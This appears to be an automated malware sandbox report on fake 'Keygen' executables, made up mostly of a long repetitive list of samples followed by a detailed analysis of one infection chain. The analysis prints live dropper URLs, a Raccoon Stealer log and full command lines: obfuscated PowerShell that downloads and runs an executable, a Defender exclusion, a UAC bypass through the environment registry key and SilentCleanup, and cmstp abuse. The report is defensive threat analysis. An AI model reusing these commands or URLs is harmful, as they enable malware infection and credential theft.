Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    148s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (7) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:56:01 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (482 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 31 IoCs
  • Loads dropped DLL 61 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (7) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (7) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\45D6.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (7) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Users\Admin\AppData\Local\Temp\45D6.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1404
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\45D6.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
          • C:\Users\Public\xni.exe
            "C:\Users\Public\xni.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2608
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2652
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2908
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2908 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\341552078494787\\* & exit
                  8⤵
                    PID:948
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2908
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2008
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2716
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:956
              • C:\Users\Public\xni.exe
                "C:\Users\Public\xni.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2780
                • C:\Users\Admin\AppData\Local\Temp\0ozkbHThc1.exe
                  "C:\Users\Admin\AppData\Local\Temp\0ozkbHThc1.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1416
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\0ozkbHThc1.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2012
                • C:\Users\Admin\AppData\Local\Temp\zH5WYYwW0A.exe
                  "C:\Users\Admin\AppData\Local\Temp\zH5WYYwW0A.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:1480
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:752
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:304
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:2832
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:2392
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:2340
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c start /min C:\Users\Public\x.bat
                              10⤵
                                PID:2360
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /K C:\Users\Public\x.bat
                                  11⤵
                                    PID:1388
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c C:\Users\Public\Natso.bat
                                9⤵
                                  PID:1452
                              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                8⤵
                                  PID:2772
                              • C:\Users\Admin\AppData\Local\Temp\i7Gq6btFX5.exe
                                "C:\Users\Admin\AppData\Local\Temp\i7Gq6btFX5.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                PID:1492
                                • \??\c:\windows\SysWOW64\cmstp.exe
                                  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\rqdr2fhk.inf
                                  8⤵
                                    PID:2140
                                • C:\Users\Admin\AppData\Local\Temp\5vbg2J8wtU.exe
                                  "C:\Users\Admin\AppData\Local\Temp\5vbg2J8wtU.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Windows security modification
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2288
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" Get-MpPreference -verbose
                                    8⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2032
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xni.exe"
                                  7⤵
                                    PID:1596
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:3024
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\45D6.tmp\m1.hta"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1896
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1628
                              • C:\Users\Public\xni.exe
                                "C:\Users\Public\xni.exe"
